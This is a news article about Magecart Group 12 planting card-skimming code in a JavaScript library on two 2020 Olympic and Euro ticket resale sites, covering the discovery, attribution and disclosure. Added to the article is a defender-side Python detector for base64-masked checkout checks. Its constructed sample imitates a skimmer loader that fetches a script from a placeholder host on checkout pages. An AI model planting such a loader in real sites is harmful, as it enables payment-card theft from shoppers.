
Magecart Group 12 named as actor behind Olympic ticket POS attack

The ticket reselling sites olympictickets2020.com and eurotickets2020.com reportedly have been compromised with Magecart POS skimming malware.

Magecart was first spotted on the two sites, which deal in tickets for the upcoming 2020 Tokyo Olympics and UEFA Euro 2020, by researchers Jacob Pimentel and Max Kersten, who detailed the compromise in late January; RiskIQ took the additional step of attributing the attack to Magecart Group 12.

“The obfuscation and skimming code we observed on opendoorcdn.com matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts. However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we’ll break down here,” RiskIQ wrote.

Group 12 employs base64 encoded checks against the URL looking for the word “checkout” to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL, RiskIQ said.

Kersten decided to look at the ticket sites based on a suspicion Pimentel had when he “stumbled” across the issue. Kersten examined the site’s JavaScript file /dist/slippry.min.js, found a short description accompanying the code, and determined that this existing, legitimate piece of JavaScript had been abused to hide the malicious code.

“In this case, the library was hosted on the targeted site itself. There is no information as to how the malicious code got appended to the library,” Kersten wrote.
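A defender-side check for the pattern described above (a base64-masked "checkout" test and loader URL appended to an otherwise legitimate library), written as an added example that is not part of the article or of either researcher's tooling; the sample script, the keyword list and the placeholder hostname are constructed:

```python
import base64
import re

# Base64-looking tokens: runs of base64 alphabet characters plus optional padding,
# bounded so that a longer run is never split in the middle.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{8,}={0,2})(?![A-Za-z0-9+/])")

# Words a skimmer loader typically tests the page URL for (assumed list).
SUSPICIOUS_WORDS = ("checkout", "payment", "billing")

def decode_candidates(js: str):
    """Yield (encoded, decoded) for each token that decodes to printable ASCII."""
    for match in B64_TOKEN.finditer(js):
        token = match.group(1)
        if len(token) % 4:            # valid base64 is always a multiple of 4
            continue
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if text.isprintable():
            yield token, text

def find_masked_indicators(js: str) -> list:
    """Return base64 tokens that hide a URL or a checkout-style keyword."""
    findings = []
    for token, text in decode_candidates(js):
        lower = text.lower()
        is_url = lower.startswith(("http://", "https://", "//"))
        if is_url or any(word in lower for word in SUSPICIOUS_WORDS):
            findings.append({"encoded": token, "decoded": text,
                             "kind": "url" if is_url else "keyword"})
    return findings

def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

# Constructed sample: a minimal slider library with a masked loader appended,
# mimicking the pattern the article describes. Not real skimmer code; the
# hostname is a placeholder.
SAMPLE_JS = (
    "!function(a){a.fn.slippry=function(){return this}}(jQuery);"
    'if(location.href.indexOf(atob("' + _b64("checkout") + '"))>-1){'
    'var s=document.createElement("script");'
    's.src=atob("' + _b64("https://cdn-placeholder.example/loader.js") + '");'
    "document.head.appendChild(s)}"
)

if __name__ == "__main__":
    for hit in find_masked_indicators(SAMPLE_JS):
        print(f"{hit['kind']:7} {hit['encoded']} -> {hit['decoded']}")
```

Run it over every first-party script served by a checkout flow, or diff the findings against a known-good copy of each library, so a newly appended decoder stands out.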

Both researchers contacted the site’s host company prior to going public and sent an email to its customer support firm. The company did take a look but at first glance did not find the malware; Pimentel then contacted them again with further details but received no response. Then, on January 21, the pair saw that the malicious code was gone, indicating the company had heeded their warning.

Anyone who purchased tickets through these two sites going back at least 50 days could be at risk and should check that their payment cards have not been compromised, suggested Pimentel.
